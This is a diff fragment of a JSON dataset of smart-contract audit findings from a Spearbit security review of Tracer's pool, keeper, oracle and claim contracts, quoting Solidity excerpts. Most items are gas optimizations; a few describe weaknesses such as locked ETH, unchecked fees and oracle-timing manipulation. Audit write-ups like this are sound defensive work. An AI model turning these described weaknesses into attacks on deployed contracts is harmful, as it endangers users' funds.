+ "Severity: Low Risk" + ] + }, + { + "title": "Pool information might be lost if setFactory() of PoolKeeper contract is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesnt know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail. function setFactory(address _factory) external override onlyOwner { factory = IPoolFactory(_factory); ... } function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) { if (!factory.isValidPool(_pool)) { // might not work if factory is changed return false; } ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Ether could be lost when calling commit()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false then the ETH stays in the PoolCommitter contract and is effectively lost. Note: This was also documented in Secureums CARE Tracking function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Race condition if PoolFactory deploy pools before fees are set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool function of PoolFactory contract can deploy pools before the changeInterval value and minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values arent clear. In some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesnt check the value of changeInter- val. The setBurningFee(), setMintingFee() and setChangeInterval() functions of PoolCommitter contract dont check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION. contract PoolFactory is IPoolFactory, Ownable { function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee,...) ... { ... require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); mintingFee = _mintingFee; burningFee = _burningFee; changeInterval = _changeInterval; ... } function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ,! ... // no check that mintingFee, burningFee, changeInterval are set poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...); } } 22 contract PoolCommitter is IPoolCommitter, Initializable { function initialize(... ,uint256 _mintingFee, uint256 _burningFee,... ) ... { ... require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); ... // no check on _changeInterval mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); ... } function setBurningFee(uint256 _burningFee) external override onlyGov { burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee ... } function setMintingFee(uint256 _mintingFee) external override onlyGov { mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee ... } function setChangeInterval(uint256 _changeInterval) external override onlyGov { changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on ,! _changeInterval ... } function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private { ... if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) { // mintingFee is greater than 1 (100%). // We want to cap this at a theoretical max of 100% mintingFee = MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18 } } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Committer not validated on withdraw claim and multi-paid claim", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "AutoClaim checks that the committer creating the claim request in makePaidClaimRequest and withdrawing the claim request in withdrawUserClaimRequest is a valid committer for the PoolFactory used in theAutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Some SMAOracle and AutoClaim state variables can be declared as immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "In the SMAOracle contract, the oracle, periods, observer, scaler and updateInterval state vari- ables are not declared as immutable. In the AutoClaim contract, the poolFactory state variable is not declared as immutable. Since the mentioned variables are only initialized in the contracts constructors, they can be declared as immutable in order to save gas.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use of counters can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "counter and i are both used as counters for the same loop. uint32 counter = 1; uint256 i = 0; ... while (i < upperBound) { ... unchecked { counter += 1; } i++; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "transferOwnership() function is inaccessible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory. However PoolFactory doesnt call the function so it is essentially dead code, making the deployment cost unnecessary additional gas. function transferOwnership(address _owner) external onlyOwner { require(_owner != address(0), \"Owner: setting to 0 address\"); owner = _owner; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use cached values when present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateAggregateBalance() function creates a temporary variable id with the value currentIn- Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to tervalIds[i]. save gas. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { // could use id continue; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "_invariantCheckContract stored twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, both in invariantCheckContract and invariantCheck. This is not necessary and costs extra gas. contract PoolCommitter is IPoolCommitter, Initializable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize( ..., address _invariantCheckContract, ... ) external override initializer { ... invariantCheckContract = _invariantCheckContract; invariantCheck = IInvariantCheck(_invariantCheckContract); ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... invariantCheckContract = initialization._invariantCheckContract; invariantCheck = IInvariantCheck(initialization._invariantCheckContract); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary if/else statement in LeveragedPool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "A boolean variable is used to indicate the type of token to mint. The if/else statement can be avoided by using LONG_INDEX or SHORT_INDEX as the parameter instead of a bool to indicate the use of long or short token. uint256 public constant LONG_INDEX = 0; uint256 public constant SHORT_INDEX = 1; ... function mintTokens(bool isLongToken,...){ if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); } else { IPoolToken(tokens[SHORT_INDEX]).mint(...); ...", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Uncached array length used in loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The users array length is used in a for loop condition, therefore the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas. for (uint256 i; i < users.length; i++) { ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary deletion of array elements in a loop is expensive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBal- ance. Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Zero-value transfers are allowed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Given that claim() can return 0 when the claim isnt valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0. Address.sendValue( payable(msg.sender), claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId) );", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unneeded onlyUnpaused modifier in setQuoteAndPool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call, the contract is always unpaused, therefore the onlyUnpaused modifier is not necessary.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary mapping access in AutoClaim.makePaidClaimRequest()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Resolving mappings consumes more gas than directly accessing the storage struct, therefore its more gas-efficient to use the already de-referenced variable than to resolve the mapping again. function makePaidClaimRequest(address user) external payable override onlyPoolCommitter { ClaimRequest storage request = claimRequests[user][msg.sender]; ... uint256 reward = claimRequests[user][msg.sender].reward; ... claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; claimRequests[user][msg.sender].reward = msg.value;", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Function complexity can be reduced from linear to constant by rewriting loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average. Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly increase the buffer size. 31 contract PriceObserver is Ownable, IPriceObserver { ... * @dev If the backing array is full (i.e., `length() == capacity()`, then * it is rotated such that the oldest price observation is deleted function add(int256 x) external override onlyWriter returns (bool) { ... if (full()) { leftRotateWithPad(x); ... } function leftRotateWithPad(int256 x) private { uint256 n = length(); /* linear scan over the [1, n] subsequence */ for (uint256 i = 1; i < n; i++) { observations[i - 1] = observations[i]; } ... } contract SMAOracle is IOracleWrapper { * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs` ... function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... /* linear scan over the [n - k, n] subsequence */ for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unused observer state variable in PoolKeeper", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There is no use for the observer state variable. It is only used in performUpkeepSinglePool in a require statement to check if is set. address public observer; function setPriceObserver(address _observer) external onlyOwner { ... observer = _observer; ... function performUpkeepSinglePool(...) require(observer != address(0), \"Observer not initialized\"); ...", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Events and event emissions can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "PoolFactory.deployPool() would result in: Having a single DeployCommitter event to be emitted after setQuoteAndPool() in 1. Having better UX/event tracking and alignment with the current behavior to emit events during the Factory deployment. 2. Removing the QuoteAndPoolChanged event that is emitted only once during the lifetime of the PoolCommitter during PoolFactory.deployPool(). 3. Removing the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed, it was initialized. This can be tracked by the DeployCommitter event.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Multi-paid claim rewards should be sent only if nonzero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter(), there could be cases where the reward sent back to the claimer is zero. In these scenarios, the reward value should be checked to avoid wasting gas.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary quad arithmetic use where integer arithmetic works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The ABDKMathQuad library is used to compute a division which is then truncated with toUint(). Semantically this is equivalent to a standard uint division, which is more gas efficient. The same library is also unnecessarily used to compute keepers reward. This can be safely done by using standard uint computation. function appropriateUpdateIntervalId(...) ... uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval)); function keeperReward(...) ... int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT ) ) ); uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals(); uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals);", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Custom errors should be used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas efficient. AutoClaim.sol: PoolCommitter\"); ,! AutoClaim.sol: AutoClaim.sol: PoolCommitter\"); ,! AutoClaim.sol: require(poolFactory.isValidPoolCommitter(msg.sender), \"msg.sender not valid require(_poolFactoryAddress != address(0), \"PoolFactory address == 0\"); require(poolFactory.isValidPoolCommitter(poolCommitterAddress), \"Invalid require(users.length == poolCommitterAddresses.length, \"Supplied arrays must be same length\"); ,! ChainlinkOracleWrapper.sol: require(_oracle != address(0), \"Oracle cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_deployer != address(0), \"Deployer cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_decimals <= MAX_DECIMALS, \"COA: too many decimals\"); ChainlinkOracleWrapper.sol: require(answeredInRound >= roundID, \"COA: Stale answer\"); ChainlinkOracleWrapper.sol: require(timeStamp != 0, \"COA: Round incomplete\"); ERC20_Cloneable.sol: ERC20_Cloneable.sol: InvariantCheck.sol: InvariantCheck.sol: LeveragedPool.sol: require(msg.sender == owner, \"msg.sender not owner\"); require(_owner != address(0), \"Owner: setting to 0 address\"); require(_factory != address(0), \"Factory address cannot be null\"); require(poolFactory.isValidPool(poolToCheck), \"Pool is invalid\"); require(!paused, \"Pool is paused\"); 36 LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(msg.sender == keeper, \"msg.sender not keeper\"); require(msg.sender == invariantCheckContract, \"msg.sender not invariantCheckContract\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address\"); ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: be 0 address\"); ,! LeveragedPool.sol: cannot be 0 address\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address\"); ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: be 0 address\"); ,! LeveragedPool.sol: require(msg.sender == poolCommitter, \"msg.sender not poolCommitter\"); require(msg.sender == governance, \"msg.sender not governance\"); require(initialization._feeAddress != address(0), \"Fee address cannot be 0 require(initialization._quoteToken != address(0), \"Quote token cannot be 0 require(initialization._oracleWrapper != address(0), \"Oracle wrapper cannot require(initialization._settlementEthOracle != address(0), \"Keeper oracle require(initialization._owner != address(0), \"Owner cannot be 0 address\"); require(initialization._keeper != address(0), \"Keeper cannot be 0 address\"); require(initialization._longToken != address(0), \"Long token cannot be 0 require(initialization._shortToken != address(0), \"Short token cannot be 0 require(initialization._poolCommitter != address(0), \"PoolCommitter cannot require(initialization._invariantCheckContract != address(0), \"InvariantCheck cannot be 0 address\"); require(initialization._fee < PoolSwapLibrary.WAD_PRECISION, \"Fee >= 100%\"); require(initialization._secondaryFeeSplitPercent <= 100, \"Secondary fee split cannot exceed 100%\"); as old governance address\"); ,! LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: invariantCheckContract\"); require(initialization._updateInterval != 0, \"Update interval cannot be 0\"); require(intervalPassed(), \"Update interval hasn't passed\"); require(account != address(0), \"Account cannot be 0 address\"); require(msg.sender == _oldSecondaryFeeAddress); require(_keeper != address(0), \"Keeper address cannot be 0 address\"); require(_governance != governance, \"New governance address cannot be same require(_governance != address(0), \"Governance address cannot be 0 require(governanceTransferInProgress, \"No governance change active\"); require(msg.sender == _provisionalGovernance, \"Not provisional governor\"); require(paused, \"Pool is live\"); require(!paused, \"Pool is paused\"); require(msg.sender == governance, \"msg.sender not governance\"); require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(msg.sender == invariantCheckContract, \"msg.sender not require(msg.sender == factory, \"Committer: not factory\"); require(msg.sender == leveragedPool, \"msg.sender not leveragedPool\"); require(msg.sender == user || msg.sender == address(autoClaim), \"msg.sender not committer or AutoClaim\"); require(_factory != address(0), \"Factory address cannot be 0 address\"); require(_invariantCheckContract != address(0), \"InvariantCheck address cannot be 0 address\"); ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: require(_autoClaim != address(0), \"AutoClaim address cannot be null\"); require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); require(userCommit.balanceLongBurnAmount <= balance.longTokens, \"Insufficient pool tokens\"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnAmount <= balance.shortTokens, ,! \"Insufficient pool tokens\"); 37 ,! PoolCommitter.sol: PoolCommitter.sol: address\"); ,! PoolCommitter.sol: address\"); ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PriceObserver.sol: PriceObserver.sol: PriceObserver.sol: SMAOracle.sol: ,! SMAOracle.sol: PoolCommitter.sol: require(userCommit.balanceLongBurnMintAmount <= balance.longTokens, \"Insufficient pool tokens\"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnMintAmount <= balance.shortTokens, \"Insufficient pool tokens\"); require(amount > 0, \"Amount must not be zero\"); require(_quoteToken != address(0), \"Quote token address cannot be 0 require(_leveragedPool != address(0), \"Leveraged pool address cannot be 0 require(_feeReceiver != address(0), \"Address cannot be null\"); require(_poolKeeper != address(0), \"PoolKeeper not set\"); require(autoClaim != address(0), \"AutoClaim not set\"); require(invariantCheck != address(0), \"InvariantCheck not set\"); require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender,\"Deployer must be oracle wrapper owner\"); require(deploymentParameters.leverageAmount >= 1 && deploymentParameters.leverageAmount <= maxLeverage,\"PoolKeeper: leveraged amount invalid\"); require(IERC20DecimalsWrapper(deploymentParameters.quoteToken).decimals() <= MAX_DECIMALS,\"Decimal precision too high\"); require(_poolKeeper != address(0), \"address cannot be null\"); require(_invariantCheck != address(0), \"address cannot be null\"); require(_autoClaim != address(0), \"address cannot be null\"); require(newMaxLeverage > 0, \"Maximum leverage must be non-zero\"); require(_feeReceiver != address(0), \"address cannot be null\"); require(newFeePercent <= 100, \"Secondary fee split cannot exceed 100%\"); require(_fee <= 0.1e18, \"Fee cannot be > 10%\"); require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); require(msg.sender == address(factory), \"Caller not factory\"); require(_factory != address(0), \"Factory cannot be 0 address\"); require(_observer != address(0), \"Price observer cannot be 0 address\"); require(firstPrice > 0, \"First price is non-positive\"); require(observer != address(0), \"Observer not initialized\"); require(timestamp >= lastPriceTimestamp, \"timestamp in the past\"); require(price != 0, \"price == 0\"); require(price != 0, \"price == 0\"); require(price != 0, \"price == 0\"); require(msg.sender == writer, \"PO: Permission denied\"); require(i < length(), \"PO: Out of bounds\"); require(_writer != address(0), \"PO: Null address not allowed\"); require(_spotOracle != address(0) && _observer != address(0) && _deployer require(_periods > 0 && _periods <= IPriceObserver(_observer).capacity(), require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); require(_updateInterval != 0, \"Update interval cannot be 0\"); require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of != address(0),\"SMA: Null address forbidden\"); \"SMA: Out of bounds\"); ,! SMAOracle.sol: SMAOracle.sol: SMAOracle.sol: update\"); ,! SMAOracle.sol: ,! bounds\");", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Different updateIntervals in SMAOracle and pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateIntervals for the pools and the SMAOracles are different. If the updateInterval for SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep() an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it cant be called again until updateInterval has passed. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... updateInterval = initialization._updateInterval; ... } function poolUpkeep(... ) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); ... } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } contract SMAOracle is IOracleWrapper { constructor(..., uint256 _updateInterval, ... ) { updateInterval = _updateInterval; } function poll() external override returns (int256) { require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to update\"); return update(); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Tight coupling between LeveragedPool and PoolCommitter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The LeveragedPool and PoolCommitter contracts call each other back and forth. This could be optimized to make the code clearer and perhaps save some gas. Here is an example: contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function poolUpkeep(...) external override onlyKeeper { ... IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); ... } } contract PoolCommitter is IPoolCommitter, Initializable { function executeCommitments(...) external override onlyPool { ... uint256 lastPriceTimestamp = pool.lastPriceTimestamp(); uint256 updateInterval = pool.updateInterval(); ... } } // call to first contract // call to first contract", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Code in SMA() is hard to read", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The SMA() function checks for k being smaller or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded. Note: This issue was also mentioned in Runtime Verification report: B15 PriceObserver - avoid magic values function SMA( int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of bounds\"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Code is chain-dependant due to fixed block time and no support for EIP-1559", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesnt use block.basefee. On Ethereum Mainnet the blocktime will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains. contract PoolKeeper is IPoolKeeper, Ownable { ... uint256 public constant BLOCK_TIME = 13; /* in seconds */ ... /// Captures fixed gas overhead for performing upkeep that's unreachable /// by `gasleft()` due to our approach to error handling in that code uint256 public constant FIXED_GAS_OVERHEAD = 80195; ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "ABDKQuad-related constants defined outside PoolSwapLibrary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library its less error prone to have any ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase. contract PoolCommitter is IPoolCommitter, Initializable { bytes16 public constant one = 0x3fff0000000000000000000000000000; ... // Set max minting fee to 100%. This is a ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Lack of a state to allow withdrawal of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Immediately after the invariants dont hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions cant happen anymore to indicate withdrawal intention. Note: the comment in withdrawQuote() is incorrect. Pool must be paused. /** ... * @dev Pool must not be paused // comment not accurate ... */ ... function withdrawQuote() external onlyGov { require(paused, \"Pool is live\"); IERC20 quoteERC = IERC20(quoteToken); uint256 balance = quoteERC.balanceOf(address(this)); IERC20(quoteToken).safeTransfer(msg.sender, balance); emit QuoteWithdrawn(msg.sender, balance); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Undocumented frontrunning protection", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "PoolFactory deployPool() per(deploymentParameters.oracleWrapper).deployer() == msg.sender frontrunning the deployment transaction of the pool. function the In of contract, check the protects IOracleWrap- against This is because the poolCommitter, LeveragedPool and the pair tokens instances are deployed at a deterministic address, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because of the different msg.sender address, that causes the deployer() check to fail. Alternatively, the attacker will have a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require( IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\" ); ... bytes32 uniquePoolHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper ) ); PoolCommitter poolCommitter = PoolCommitter( Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash) ); ... LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash)); ... } function deployPairToken(... ) internal returns (address) { ... bytes32 uniqueTokenHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper, direction ) ); PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, ,! 